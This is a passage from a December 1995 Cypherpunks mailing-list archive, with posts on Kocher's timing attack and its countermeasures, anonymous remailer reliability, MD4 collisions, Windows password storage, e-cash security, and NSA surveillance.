Houston * >Electronic Frontiers New Hampshire * Electronic Privacy Information >Center * Feminists For Free Expression * First Amendment Teach-In * >Florida Coalition Against Censorship * FranceCom, Inc. Web Advertising >Services * Friendly Anti-Censorship Taskforce for Students * Hands >Off! The Net * Inland Book Company * Inner Circle Technologies, Inc. * >Inst. for Global Communications * Internet On-Ramp, Inc. * Internet >Users Consortium * Joint Artists' and Music Promotions Political Action >Committee * The Libertarian Party * Marijuana Policy Project * >Metropolitan Data Networks Ltd. * MindVox * MN Grassroots Party * >National Bicycle Greenway * National Campaign for Freedom of Expression >* National Coalition Against Censorship * National Gay and Lesbian Task >Force * National Public Telecomputing Network * National Writers Union >* Oregon Coast RISC * Panix Public Access Internet * People for the >American Way * Republican Liberty Caucus * Rock Out Censorship * >Society for Electronic Access * The Thing International BBS Network * >The WELL * Voters Telecommunications Watch > >(Note: All 'Electronic Frontier' organizations are independent entities, > not EFF chapters or divisions.) > >________________________________________________________________________ > End Alert >======================================================================== > > > >~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ > Paula Davidson > mesoelectronic hunter/gatherer > davidson at cs.unca.edu http://www.cs.unca.edu/~davidson/ > Specializing in Exploration and Tool Use on the Matrix of the Net >~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ > > > > > ><---- End Forwarded Message ----> > > > Sarah Thompson, M.D. righter at aros.net Executive Director, Women Against Gun Control PO Box 271307 Salt Lake City, UT 84127-1307 (801)328-9660 - voice (801)966-7278 - fax From frissell at panix.com Mon Dec 11 14:04:47 1995 From: frissell at panix.com (Duncan Frissell) Date: Tue, 12 Dec 1995 06:04:47 +0800 Subject: .PWL spin Message-ID: <2.2b8.32.19951211114417.0088297c@panix.com> At 05:12 PM 12/9/95 -0500, Joseph M. Reagle Jr. wrote: > So now, I don't even bother with that, I'm just hoping securdrv, >sfs, or something makes it to W95 one of these days... (I doubt either of >those will make it...) SecureDrive works under Windows 95 if you disable all 32-bit disk drivers. Control Panel System Performance File System Troubleshooting Disable all 32 bit protected mode disk drivers You have to run SECTSR before starting Win95. A pain but it does work. I will be working on figuring out how to force Windows 95 to disable 32 bit access for just my SecureDrive disk alone. Should be possible. DCF "Windows 95 beats having a personal life." From samman-ben at CS.YALE.EDU Mon Dec 11 14:14:36 1995 From: samman-ben at CS.YALE.EDU (Rev. Ben) Date: Tue, 12 Dec 1995 06:14:36 +0800 Subject: Timing Attacks Message-ID: I'm not so sure I see the great usefulness of this attack. I've taken a cursory glance at Mr. Kocher's paper on-line and what it comes down to essentially, if I undestand it correctly, is that you need to be as sure of the timing as you can be. Now, on a distributed system, you can't measure those timings, because any latency could come from the originating computer, the links in the middle or any combination of them. Also precise timings can be limited by fluctuating load averages amongst other things in a time-sharing computing environment. While this might work in a lab, with the current advances in computing speed, the differences between a fast and a slow calculation can easily be opaqued by network lag. Am I missing something, or does this attack only work in a lab? Ben. ____ Ben Samman..............................................samman at cs.yale.edu "If what Proust says is true, that happiness is the absence of fever, then I will never know happiness. For I am possessed by a fever for knowledge, experience, and creation." -Anais Nin PGP Encrypted Mail Welcomed Finger samman at powered.cs.yale.edu for key From raph at CS.Berkeley.EDU Mon Dec 11 14:23:57 1995 From: raph at CS.Berkeley.EDU (Raph Levien) Date: Tue, 12 Dec 1995 06:23:57 +0800 Subject: List of reliable remailers Message-ID: <199512111450.GAA10737@kiwi.cs.berkeley.edu> I operate a remailer pinging service which collects detailed information about remailer features and reliability. To use it, just finger remailer-list at kiwi.cs.berkeley.edu There is also a Web version of the same information, plus lots of interesting links to remailer-related resources, at: http://www.cs.berkeley.edu/~raph/remailer-list.html This information is used by premail, a remailer chaining and PGP encrypting client for outgoing mail, which is available at: ftp://ftp.csua.berkeley.edu/pub/cypherpunks/premail/premail-0.33a.tar.gz For the PGP public keys of the remailers, finger pgpkeys at kiwi.cs.berkeley.edu This is the current info: REMAILER LIST This is an automatically generated listing of remailers. The first part of the listing shows the remailers along with configuration options and special features for each of the remailers. The second part shows the 12-day history, and average latency and uptime for each remailer. You can also get this list by fingering remailer-list at kiwi.cs.berkeley.edu. $remailer{"extropia"} = " cpunk pgp special"; $remailer{"portal"} = " cpunk pgp hash"; $remailer{"alumni"} = " cpunk pgp hash"; $remailer{"bsu-cs"} = " cpunk hash ksub"; $remailer{"c2"} = " eric pgp hash reord"; $remailer{"penet"} = " penet post"; $remailer{"ideath"} = " cpunk hash ksub reord"; $remailer{"hacktic"} = " cpunk mix pgp hash latent cut post ek"; $remailer{"flame"} = " cpunk mix pgp. hash latent cut post ek reord"; $remailer{"rahul"} = " cpunk pgp hash filter"; $remailer{"mix"} = " cpunk mix pgp hash latent cut ek ksub reord ?"; $remailer{"syrinx"} = " cpunk pgp hash cut reord mix post"; $remailer{"ford"} = " cpunk pgp hash ksub"; $remailer{"hroller"} = " cpunk pgp hash latent ek"; $remailer{"vishnu"} = " cpunk mix pgp. hash latent cut ek ksub reord"; $remailer{"robo"} = " cpunk hash mix"; $remailer{"replay"} = " cpunk mix pgp hash latent cut post ek"; $remailer{"spook"} = " cpunk mix pgp hash latent cut ek reord"; $remailer{"rmadillo"} = " mix cpunk pgp hash latent cut"; $remailer{"ecafe"} = " cpunk mix"; $remailer{"wmono"} = " cpunk mix pgp. hash latent cut ek"; $remailer{"shinobi"} = " cpunk mix hash latent cut ek reorder"; $remailer{"amnesia"} = " cpunk mix pgp hash latent cut ek ksub"; $remailer{"gondolin"} = " cpunk mix pgp hash latent cut ek reord"; catalyst at netcom.com is _not_ a remailer. lmccarth at ducie.cs.umass.edu is _not_ a remailer. usura at replay.com is _not_ a remailer. Groups of remailers sharing a machine or operator: (robo hroller c2) (flame hacktic replay) (wmono spook) (alumni portal) Use "premail -getkeys pgpkeys at kiwi.cs.berkeley.edu" to get PGP keys for the remailers. Fingering this address works too. Last update: Mon 11 Dec 95 6:49:36 PST remailer email address history latency uptime ----------------------------------------------------------------------- portal hfinney at shell.portal.com #+*########* :44 99.85% hacktic remailer at utopia.hacktic.nl ******* **** 7:17 99.72% c2 remail at c2.org *++-.-++ +++ 47:37 99.65% rmadillo remailer at armadillo.com ++++++++ +++ 38:51 99.38% amnesia amnesia at chardos.connix.com -+- -+ +--+ 1:55:48 99.36% flame remailer at flame.alias.net * *** * **** 19:31 99.30% spook remailer at valhalla.phoenix.net ..-* ****** 53:58 99.08% extropia remail at extropia.wimsey.com ---.- -.--- 6:49:13 98.44% shinobi remailer at shinobi.alias.net + --- -- - + 53:31 98.38% ecafe cpunk at remail.ecafe.org ### ##-## 2:18 98.11% wmono wmono at valhalla.phoenix.net * ** ** 12:36 98.07% mix mixmaster at remail.obscura.com .-__ _-__. 27:56:43 97.91% replay remailer at replay.com * + +** ** 5:41 97.69% gondolin mix at remail.gondolin.org - --_.- 10:47:46 97.00% vishnu mixmaster at vishnu.alias.net *#** # 5:26 96.37% alumni hal at alumni.caltech.edu *# # # 1:20 96.28% bsu-cs nowhere at bsu-cs.bsu.edu ## # # # :15 95.56% ford remailer at bi-node.zerberus.de ---._...-- 15:06:29 94.28% hroller hroller at c2.org ####*+### -# 5:21 94.25% rahul homer at rahul.net ** +* *+**+* 4:32 99.67% penet anon at anon.penet.fi - . -- 13:10:01 83.74% robo robo at c2.org #-## 5:59 52.62% History key * # response in less than 5 minutes. * * response in less than 1 hour. * + response in less than 4 hours. * - response in less than 24 hours. * . response in more than 1 day. * _ response came back too late (more than 2 days). cpunk A major class of remailers. Supports Request-Remailing-To: field. eric A variant of the cpunk style. Uses Anon-Send-To: instead. penet The third class of remailers (at least for right now). Uses X-Anon-To: in the header. pgp Remailer supports encryption with PGP. A period after the keyword means that the short name, rather than the full email address, should be used as the encryption key ID. hash Supports ## pasting, so anything can be put into the headers of outgoing messages. ksub Remailer always kills subject header, even in non-pgp mode. nsub Remailer always preserves subject header, even in pgp mode. latent Supports Matt Ghio's Latent-Time: option. cut Supports Matt Ghio's Cutmarks: option. post Post to Usenet using Post-To: or Anon-Post-To: header. ek Encrypt responses in reply blocks using Encrypt-Key: header. special Accepts only pgp encrypted messages. mix Can accept messages in Mixmaster format. reord Attempts to foil traffic analysis by reordering messages. Note: I'm relying on the word of the remailer operator here, and haven't verified the reord info myself. mon Remailer has been known to monitor contents of private email. filter Remailer has been known to filter messages based on content. If not listed in conjunction with mon, then only messages destined for public forums are subject to filtering. Raph Levien From nsb at nsb.fv.com Mon Dec 11 14:48:59 1995 From: nsb at nsb.fv.com (Nathaniel Borenstein) Date: Tue, 12 Dec 1995 06:48:59 +0800 Subject: More FUD from First Virtual In-Reply-To: <199512110750.XAA11161@ix2.ix.netcom.com> Message-ID: <0kn1Q6CMc50e02irtU@nsb.fv.com> Excerpts from mail.limbo: 10-Dec-95 Re: More FUD from First Vir.. Bill Stewart at ix.netcom.c (1289*) > At 08:51 AM 12/10/95 -0500, Nathaniel Borenstein (Tense Hot > Alien In Barn) wrote: > >In any event, I could write a virus that sits in > >front of the e-cash program and steals your keys when next you run the > >e-cash program. Software's just too easy to fool. That's why I regard > >the risk of catastrophe as being fairly large in software-based e-cash > >schemes. > How is this different for an ecash program vs. a First Virtual email > acknowledgement program, where either a (really hairy) virus, or, > more practically, an active email interloper could fake FV acks? It's fundamentally different because FV (unlike all the other systems, to my knowledge) is a "closed loop" financial instrument. By this I mean that it doesn't depend on a one-way passage of some kind of credentials to consummate a transaction. It would be almost equally easy to write a keyboard virus that intercepted your FV-ID as it would be to write one that intercepted your e-cash keys, but then there would be a pretty significant additional layer for the seamless interception and response to the confirmation email. (Note the "seamless" here. If you do it in such a way that it interferes with the user's normal mail, it will be caught pretty quickly.) Also, the "almost equally easy" refers to the fact that FV-ID's are free-form text, a very deliberate design decision that makes them far harder to sniff, even at the keyboard level, than credit card numbers (which are self-identifying), although a good e-cash system will share this quality for its pass phrases. > While hardware may be the best encryption solution for the average user > (as you say, and I think I agree with you), it needs to have some password > interface such as a small keypad on the front of the smartcard, to prevent > its usability after theft. Right, absolutely. But in this case, a virus still can't fake what's on the hardware. > Of course, there are problems with digicash as well; my Digicash play-money > account thinks it's empty (in spite of having half a dozen coin-looking files), > and doesn't recognize any of the half-dozen passwords I've guessed I might have > used with it, so I'm not able to use Sameer's digicash-powered remailer. And you're a *sophisticated* user, right Bill? This just underscores some other comments I've made in the past about Joe Sixpack. I think there will be serious usability problems. -- Nathaniel -------- Nathaniel Borenstein | (Tense Hot Alien In Barn) Chief Scientist, First Virtual Holdings | VIRTUAL YELLOW RIBBON: FAQ & PGP key: nsb+faq at nsb.fv.com | http://www.netresponse.com/zldf From perry at piermont.com Mon Dec 11 14:50:02 1995 From: perry at piermont.com (Perry E. Metzger) Date: Tue, 12 Dec 1995 06:50:02 +0800 Subject: Timing Cryptanalysis Attack In-Reply-To: Message-ID: <199512111813.NAA02194@jekyll.piermont.com> Eric Young writes: > Read the SKIP spec (SKIP is Sun's IP level encryption protocol). It uses > Diffle-Hellman certificates. Photuris, which likely will be the standard way to do this sort of thing on top of IPsec, also suffers from the problem, but I suspect the next version of the draft (number 9) will have it fixed. More interesting is the fact that a number of NSA vetted protocols seem to have the flaw. Obviously, they either didn't know or didn't say anything about it to the folks designing such stuff... Perry From perry at piermont.com Mon Dec 11 14:50:11 1995 From: perry at piermont.com (Perry E. Metzger) Date: Tue, 12 Dec 1995 06:50:11 +0800 Subject: Timing Cryptanalysis Attack In-Reply-To: <199512110845.JAA25564@utopia.hacktic.nl> Message-ID: <199512111810.NAA02186@jekyll.piermont.com> Anonymous writes: > I just read this paper, and while it is somewhat interesting, I > don't think the walls of cryptography are in any danger of > crumbling. > > People employing systems like PGP are already advised to use them > on private machines, with only one user, and untampered-with > binaries. Timings like the ones listed are trivial to take in establishing things like SSL sessions, or Photuris sessions. The danger is to online protocols, not to PGP. Any reason you felt you had to say this anonymously? Perry From tallpaul at pipeline.com Mon Dec 11 14:50:51 1995 From: tallpaul at pipeline.com (tallpaul) Date: Tue, 12 Dec 1995 06:50:51 +0800 Subject: [NOISE] GAK and self-incrimination? Message-ID: <199512111401.JAA08705@pipe6.nyc.pipeline.com> On Dec 10, 1995 23:55:13, 'Bill Stewart ' wrote: > >Testimony was often compelled by more direct means than threatened >contempt citations. Piling rocks on people until they talked was >still in use in the 1600s, unless I've got my dates wrong. >It may have gone out of fashion slightly after witch-burning, >but was still in recent cultural memory of the Constitution's authors. > The rock process was called "pressing" and it had an economic basis to it, if my memory serves. The laws of the time permitted the state (i.e. often the little village) to confiscate the property of those convicted of crimes in a court. Remember that many of the witch etc. accusations were made among the residents of the same villages with all of the petty resentments, vindictive people, and "nuts" that exist in every location and every time throughout history. The legal system did not permit someone to be tried for a crime until they had entered their plea of guilty or not guilty. In other words, you could charge them with being a witch. Then you demanded that they enter a plea. Then you try them, and likely convict them. Then you confiscate their property. People who reused to enter a plea jammed up the entire process -- no plea = no trial = no verdict = no property confiscation. To avoid this unpleasant series of equations, the forces bringing the charges wanted a way of forcing people to plea to the charge. They wanted it to be reasonably safe, since a person who died passed their property on to the rest of the family. But they also wanted it to be unpleasant enough to actually compell the accused to actually enter the plea. Thus pressing was invented. Stones were slowly added over a period of days to produce maximum discomfort with minimal chance of an accidental death. (Now what does this have to do with strong crypto?) Well, why would the person charged refuse to plea unless they were guilty? (Beginning to sound a little familiar?) Futplex's original post brings up yet another example from history where human behavior has nothing to do with crime. The person who refused to plead so refused not out of any sense of guilt but from something entirely different. If I'm not guilty why do I want strong crypto? Sometimes for the same reason I want a shredder. And why do I want a shredder? Sometimes just to keep the local gossip from going through my papers after I throw them out. --tallpaul From cabeen at netcom.com Mon Dec 11 14:59:25 1995 From: cabeen at netcom.com (Ted Cabeen) Date: Tue, 12 Dec 1995 06:59:25 +0800 Subject: Win NT proprietary pw encryption (Was: Re: Windows .PWL cracker...) Message-ID: <2.2b7.32.19951211214329.002cc3a8@netcom4.netcom.com> At 11:39 AM 12/11/95 +0000, you wrote: >Futplex wrote: >> someone quoted: >> Microsoft Knowledge Base article Q102716 says: >> > Storage of the Passwords in the SAM Database >> [...] >> > The second encryption is decryptable by anyone who has access to the >> > double-encrypted password, the user's RID, and the algorithm. The second >> > encryption is used for obfuscation purposes. >> >> Anyone feel like putting together some sample plaintext/ciphertext pairs ? > >This will be really difficult, and in practice rather pointless. NT does >not allow any user, priviliged or not, to gain access to any form (encrypted >or not) of the passwords. They are stored in a protected area of the system >registry that only the OS itself can access. The best that you can do is >to ask the OS whether a given username/password pair is valid or not, and it >took until version 3.51 before MS let you do even that! I took a quick look in my NT registry and you can get access to the Account Manager section of the registry by manually changing the permissions and giving yourself access. I didn't have the time to look at all of the entries in the registry, but there's a lot of stuff there and I wouldn't be suprised if the encryted passwords were available. Of course, you have to be an administrator to change the permissions, but it is possible. _____________________________________________________________________________ Ted Cabeen cabeen at netcom.com Finger for PGP Public Key secabeen at midway.uchicago.edu "I have taken all knowledge to be my province." cococabeen at aol.com From mab at crypto.com Mon Dec 11 15:02:56 1995 From: mab at crypto.com (Matt Blaze) Date: Tue, 12 Dec 1995 07:02:56 +0800 Subject: Timing Cryptanalysis Attack In-Reply-To: <199512111815.NAA02202@jekyll.piermont.com> Message-ID: <199512111906.OAA01139@crypto.com> >The trivial way to handle this is simply to check user time with the >right system calls and make sure it always comes out the same with an >apropriate number of sleeps. Of course, this works against a remote adversary, but not against one on the same machine who can look at actual CPU consumption (which doesn't increase when the target is blocked). -matt From dsmith at midwest.net Tue Dec 12 07:14:58 1995 From: dsmith at midwest.net (David E. Smith) Date: Tue, 12 Dec 95 07:14:58 PST Subject: The Elevator Problem Message-ID: <199512121533.JAA21358@cdale1.midwest.net> At 05:29 PM 12/11/95 -0500, it was written: >[...] >> but since the contents of the key were never >> touched on DIRECTLY, no eavesdfropper could determine the key, > >No, the integrity of the system really depends upon the quantum properties >of light. Among other things, Heisenberg's Uncertainty Principle makes it >impossible for Eve to "eavesdrop" on the photons without affecting them >measurably. > Disregarding the "quantum properties of light" issue, if Eve can listen in on every communication between Alice and Bob about their keys, then doesn't she have enough information to reconstruct the key herself? The way I understand the system, in order for Alice to have Bob's key (and vice versa) they each have to transmit a considerable amount of data about their keys. Even if those data are in the form of "twenty questions," neither knows anything about the other's key at the start. Is there something painfully obvious that I'm missing? >In this situation Eve can read the email traffic without modifying it, so the >game is up. Exactly. Dave ----- David E. Smith, c/o Southeast Missouri State University 1210 Towers South, Cape Girardeau MO USA 63701-4745, +1(573)339-3814 PGP ID 0x92732139, homepage http://www.midwest.net/scribers/dsmith/ Quote: "And if we change, well, I'll love you anyway" - Alice In Chains Dec15-Jan15: (618)244-3340/2209 Perkins, Mt Vernon IL 62864 From dsmith at midwest.net Tue Dec 12 07:15:02 1995 From: dsmith at midwest.net (David E. Smith) Date: Tue, 12 Dec 95 07:15:02 PST Subject: Timing Cryptanalysis Attack Message-ID: <199512121533.JAA21362@cdale1.midwest.net> At 04:45 AM 12/12/95 -0500, Black Unicorn wrote: >> | PS - I think Paul was a bit surprised when Jim Barksdale pulled >> | out his wallet and handed him 10 crisp $100 bills. :-) >> Great. mention it where the IRS is sure to be listening. :) >Why would the IRS listen? Everyone knows the tax system is voluntary. Do you know something I don't? :) Would you mind sharing? :) Dave ----- David E. Smith, c/o Southeast Missouri State University 1210 Towers South, Cape Girardeau MO USA 63701-4745, +1(573)339-3814 PGP ID 0x92732139, homepage http://www.midwest.net/scribers/dsmith/ Quote: "And if we change, well, I'll love you anyway" - Alice In Chains Dec15-Jan15: (618)244-3340/2209 Perkins, Mt Vernon IL 62864 From pcw at access.digex.net Tue Dec 12 07:29:41 1995 From: pcw at access.digex.net (Peter Wayner) Date: Tue, 12 Dec 95 07:29:41 PST Subject: Today's Baltimore Sun on the NSA... Message-ID: As I mentioned on Sunday, the Baltimore Sun is running a long series on the NSA. Today, the published an article that described how the NSA routinely listens into the phone calls of Americans. This happens in two ways. First, if the conversation leaves the country then the NSA can intercept it. Second, the NSA is also allowed to grab local phone calls for "training" purposes. The funniest part of the article mentioned that Henry Kissenger got both ends of the stick. He relied on NSA to pass him sensitive information about his rivals. But the head of the Department of Defense, who got to appoint the head of the NSA, made sure that the NSA told him what Kissenger was up to. The strangest anecdote involved a Baltimore Sun reporter who called Cuban diplomats from overseas. This was picked up by NSA and the evesdropper openly chatted about it a civilian cocktail party. The details got back to the reporter. The parties in the Baltimore suburbs are from the pages of Fleming not from the pages of Cheever. There is some debate about the whole issue of snooping on American citizens. Everyone quoted on the record says it's all pretty upstanding and good. The paper also gives a fair amount of ink to the argument that American citizens could be involved in terrorism too. This seems to be logical to me. The deepest point made was that NSA could never really assume greater law enforcement practices because this would involve disseminating their information to a much larger audience. Since using secret information often reveals that you can get it, there is little doubt that people would stop using the phone system and the other information sponges. So much for absolute power. -Peter Wayner -=-=-= On Friday, the last article in the series is promised to report, "The next war will be fought with computers. NSA is getting ready." You will be able to buy a reprint of the NSA stories from SunSource. $3.95. Call 410-332-6962. From pjm at ionia.engr.sgi.com Mon Dec 11 19:02:53 1995 From: pjm at ionia.engr.sgi.com (Patrick May) Date: Tue, 12 Dec 1995 11:02:53 +0800 Subject: [NOISE] Re: Pornographic stories In-Reply-To: <8043943A02502C79@-SMF-> Message-ID: <199512112333.PAA12799@ionia.engr.sgi.com> -----BEGIN PGP SIGNED MESSAGE----- Scott Binkley writes: > Stop posting this type of crap on the Internet. I'd be pleased if people would refrain from posting to inappropriate groups. There a number of acceptable venues for pornography on the Net. > People like you are the ones to get everyone censored. If we censor ourselves, the bluenoses win. > Hopefully everyone else will flame you a thousand times over A polite note suggesting that one remember to log out when leaving one's terminal unattended should suffice. Regards, Patrick May -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMMy/qu5Yg08fDKehAQG8nAQAlJZjWwGPfkCgM3+umOFlfNd0wYZBCKiw M3JktEPpBpviMmiiH6WgKI0BHpvWhLmEcwVQ7Bs56pRtLma/gp66ljOC+eP2m78f KxN8Ao9o/MDDdX7LHUHC7IeliMikBcdkCBttrHdKXpY6xTFAygwVH2qC+rmam0Xp Gz0USqvzDc0= =2V4I -----END PGP SIGNATURE----- From tomw at netscape.com Mon Dec 11 19:25:32 1995 From: tomw at netscape.com (Tom Weinstein) Date: Tue, 12 Dec 1995 11:25:32 +0800 Subject: Timing Cryptanalysis Attack In-Reply-To: <199512120100.UAA00263@jekyll.piermont.com> Message-ID: <30CCD843.6231@netscape.com> Perry E. Metzger wrote: > > Tom Weinstein writes: > > > The problem with that approach is that if the system is heavily > > loaded, it can take an arbitrarily large amount of user time. > > Totally untrue. The process can take an arbitrary amount of wall clock > time, not user time. Whoops. You are absolutely correct. Pardon my brain-damage. I was thinking wall clock time, as you indicated. > > Somewhat better is to sleep for a random amount of time after you're > > done. > > I don't think so. First of all, you can still extract some > information. If you have been gone as long as the maximum computation > plus the maximum random fudge, you know that you had to have conducted > the maximum computation. This means that some bits are indeed > leaking. Your approach also has the disadvantage that it is hard to > produce good random numbers -- you are perhaps familiar with that > problem? Yes, you are correct. It's better than taking a fixed amount of wall clock time, but definitely not better than a fixed amount of user time. As Paul mentions in his extended abstract, there is actually an easy way to fix the problem without hurting either latency or throughput much. If you blind and and unblind around the modular exponentiation, it appears impossible to perform this attack. Because you don't know the inputs to the exponentiation operation, you can't make any predictions based on those inputs. -- Sure we spend a lot of money, but that doesn't mean | Tom Weinstein we *do* anything. -- Washington DC motto | tomw at netscape.com From futplex at pseudonym.com Mon Dec 11 19:35:26 1995 From: futplex at pseudonym.com (Futplex) Date: Tue, 12 Dec 1995 11:35:26 +0800 Subject: [NOISE] anti-copy In-Reply-To: <199512101537.KAA04258@detroit.freenet.org> Message-ID: <199512110852.DAA15235@opine.cs.umass.edu> Did someone just publish the list address in a newspaper again ? It seems to be one of those days.... Daark writes: > How would it be possible to create files that KNOW they are > a copy? It's not, to the great dismay of the Software Publishers Association (or whatever they're called). -Futplex From futplex at pseudonym.com Mon Dec 11 19:35:27 1995 From: futplex at pseudonym.com (Futplex) Date: Tue, 12 Dec 1995 11:35:27 +0800 Subject: More elveator problem In-Reply-To: <199512110720.BAA04212@UNiX.asb.com> Message-ID: <199512110904.EAA15250@opine.cs.umass.edu> The cypherpunk formerly known as Deranged Mutant writes: > Wait... are unique IDs secret from others? Can they share theirs with > ea. other without compromising something? > > Maybe using a hash of their combined secret ideas (adding them, or > mixing the bits... how long is the unique ID?) can be used to generate > a "key" to exchange other information.... The fundamental problem is that Eve and her sisters get to hear both IDs when Alice and Bob exchange them. So Eve can also do the hash, XOR, or whatever. DH skirts this obstacle brilliantly. -Futplex From stewarts at ix.netcom.com Mon Dec 11 19:35:32 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Tue, 12 Dec 1995 11:35:32 +0800 Subject: Time-based cryptanalysis: How to defeat it? Message-ID: <199512110854.AAA14652@ix2.ix.netcom.com> At 10:56 PM 12/10/95 -0800, anonymous-remailer wrote: >Assuming Alice is decrypting a secret message sent to her >by Bob (on her very slow C64 ;), and Mallet is watching >with a stopwatch in hand, hoping to determine Alice's secret >key... The modern equivalent of that very slow C64 is the smartcard/ electronic wallet. Sounds like we'll have to implement them very carefully.... >It would be good to place inside the decryption routines >a timer (WELL PLACED!) that waits a random-number of cycles >(based on key-strokes, mouse position, etc.) to defeat this >type of cryptanalysis? The most interesting detail in the paper, to me, was: PK> Computing optional Ri+1 calculations regardless of whether the exponent PK> bit is set does not work and can actually make the attack easier; PK> the computations still diverge but attackers no longer have to identify PK> the lack of a correlation for adjacent zero exponent bits. My immediate reaction to the description of the timing attack on Diffie-Hellman had, of course, been to do precisely that :-) #-- # Thanks; Bill # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281 From stewarts at ix.netcom.com Mon Dec 11 19:35:39 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Tue, 12 Dec 1995 11:35:39 +0800 Subject: MD4 weaknesses (Was: Windows .PWL cracker implemented as a Word Basic virus) Message-ID: <199512110901.BAA14965@ix2.ix.netcom.com> At 06:20 PM 12/10/95 -0500, daw at quito.CS.Berkeley.EDU (David A Wagner) wrote: >-----BEGIN PGP SIGNED MESSAGE----- > >In article <95Dec10.175318edt.1732 at cannon.ecf.toronto.edu>, >SINCLAIR DOUGLAS N wrote: >> My understanding was that MD4 had been broken once, at the cost of >> much computer time. >Not *that* much computer time... >In my copy of Hans Dobbertin's paper, the abstract says > >``An implementation of our >attack allows to find collisions for MD4 in less than a minute on a PC.'' > >As far as I know, the difficulty of inverting MD4 is still an open >problem -- but why would you want to use a broken algorithm like MD4 >when you can use MD2, MD5, or SHA? Do you have a reference to Dobbertin's paper? Schneier's discussion of MD4 says that DeBoor and Bosselaers cryptanalyzed the last two of the three rounds of MD4 in 1991, Merkle did the first two, and Biham discussed a differential attack on the first two, but nobody had done the whole thing. Does Dobbertin's attack take one of these and use it to feed an otherwise-brute-force search? #-- # Thanks; Bill # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281 From futplex at pseudonym.com Mon Dec 11 19:35:46 1995 From: futplex at pseudonym.com (Futplex) Date: Tue, 12 Dec 1995 11:35:46 +0800 Subject: [NOISE] Is it possible? In-Reply-To: Message-ID: <199512110846.DAA15037@opine.cs.umass.edu> Laszlo Vecsey writes: > How can I be sure that the source has not been modified from the original > distribution before it is compiled? It helps to be Ken Thompson.... -Futplex From jsw at netscape.com Mon Dec 11 19:39:15 1995 From: jsw at netscape.com (Jeff Weinstein) Date: Tue, 12 Dec 1995 11:39:15 +0800 Subject: Timing Cryptanalysis Attack In-Reply-To: <199512112125.QAA07753@homeport.org> Message-ID: <30CCBA28.24F8@netscape.com> Adam Shostack wrote: > > Jeff Weinstein wrote: > > | PS - I think Paul was a bit surprised when Jim Barksdale pulled > | out his wallet and handed him 10 crisp $100 bills. :-) > > Great. mention it where the IRS is sure to be listening. :) I know the spooks hang out here, but I didn't think the IRS did. Maybe the NSA just forwards them all net traffic that includes the words cash, bills, etc. :-) Since Paul mentioned it on his web page, and it was also in a press release, I figured it was OK. --Jeff -- Jeff Weinstein - Electronic Munitions Specialist Netscape Communication Corporation jsw at netscape.com - http://home.netscape.com/people/jsw Any opinions expressed above are mine. From perry at piermont.com Mon Dec 11 20:53:35 1995 From: perry at piermont.com (Perry E. Metzger) Date: Tue, 12 Dec 1995 12:53:35 +0800 Subject: Timing Attacks In-Reply-To: <199512120026.QAA19309@ix12.ix.netcom.com> Message-ID: <199512120111.UAA00312@jekyll.piermont.com> Bill Stewart writes: > The attack also works better if you can try it multiple times with the same > numbers to work around random latency; the lowest number is closest to real. Other statistical techniques can be used to get around random network latency. Anyone who's used NTP is aware of the possibilities... .pm From pmonta at qualcomm.com Mon Dec 11 21:05:05 1995 From: pmonta at qualcomm.com (Peter Monta) Date: Tue, 12 Dec 1995 13:05:05 +0800 Subject: Timing Cryptanalysis Attack In-Reply-To: <199512111906.OAA01139@crypto.com> Message-ID: <199512120056.QAA16055@mage.qualcomm.com> Matt Blaze writes: > Of course, this works against a remote adversary, but not against one > on the same machine who can look at actual CPU consumption (which doesn't > increase when the target is blocked). Maybe this is a good reason to spinwait, rather than sleep, until the timer expires. It would be pretty subtle to distinguish that from "real" computation. Peter Monta From stewarts at ix.netcom.com Mon Dec 11 21:44:35 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Tue, 12 Dec 1995 13:44:35 +0800 Subject: Timing Attacks Message-ID: <199512120026.QAA19309@ix12.ix.netcom.com> At 02:15 PM 12/11/95 -0500, "Rev. Ben" wrote: >I'm not so sure I see the great usefulness of this attack. > >I've taken a cursory glance at Mr. Kocher's paper on-line and what it >comes down to essentially, if I undestand it correctly, is that you need >to be as sure of the timing as you can be. > >Now, on a distributed system, you can't measure those timings, because >any latency could come from the originating computer, the links in the >middle or any combination of them. ... >Am I missing something, or does this attack only work in a lab? It works much better in relatively controlled environments - smart cards, for example, are usually both slow and not busy doing other things, plus you can get a bunch of them and analyze the variance in performance across cards. The Usual Suspects say this does appear to affect Fortezza, plus things like digital wallets are obvious targets. If you're clever, you can design smart-card readers that do the measurements for you, and convince people to use them. The attack also works better if you can try it multiple times with the same numbers to work around random latency; the lowest number is closest to real. Running on time-shared machines increases randomness a lot (though if the Bad Guys have an account there, they can watch the machine's performance more closely.) On the other hand, running on shared machines has its own set of security risks, though they're better places for Diffie-Hellman systems than secret keys - but Diffie-Hellman needs authentication to be safe against MITM, and therefore there's still a secret key for that. Interesting times.... We've all been discussing whether there'd be some major theoretical-mathematics breakthrough, and along comes an engineering attack. #-- # Thanks; Bill # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281 From tcmay at got.net Mon Dec 11 21:54:50 1995 From: tcmay at got.net (Timothy C. May) Date: Tue, 12 Dec 1995 13:54:50 +0800 Subject: Voluntary Key Escrow is Freedom, Surveillance is Privacy Message-ID: Citizen-unit jim bell wrote: >Pardon me, but since this "key escrow" system was always claimed to be >"voluntary," then how can there be any kind of legal penalties associated >with "failure to release" those keys? > > >Which raises another question: Let's suppose I owned a product based on >CKE, and I went to the escrow agent and said, "This escrow is voluntary, >right? If so, erase my key in your possession." > >Not that I'd trust them to do so, but how "voluntary" can a system be if >people can't volunteer out of it? In much the same sense the income tax system is "voluntary." For further details, consult the definition of "newspeak" in Orwell's novel. Remember, saying that Voluntary Key Escrow is neither "voluntary" nor "escrow" is thoughtcrime. Freedom is Slavery, Surveillance is Privacy, Censorship is Decency --Citizen-Unit May227-80-5992 Views 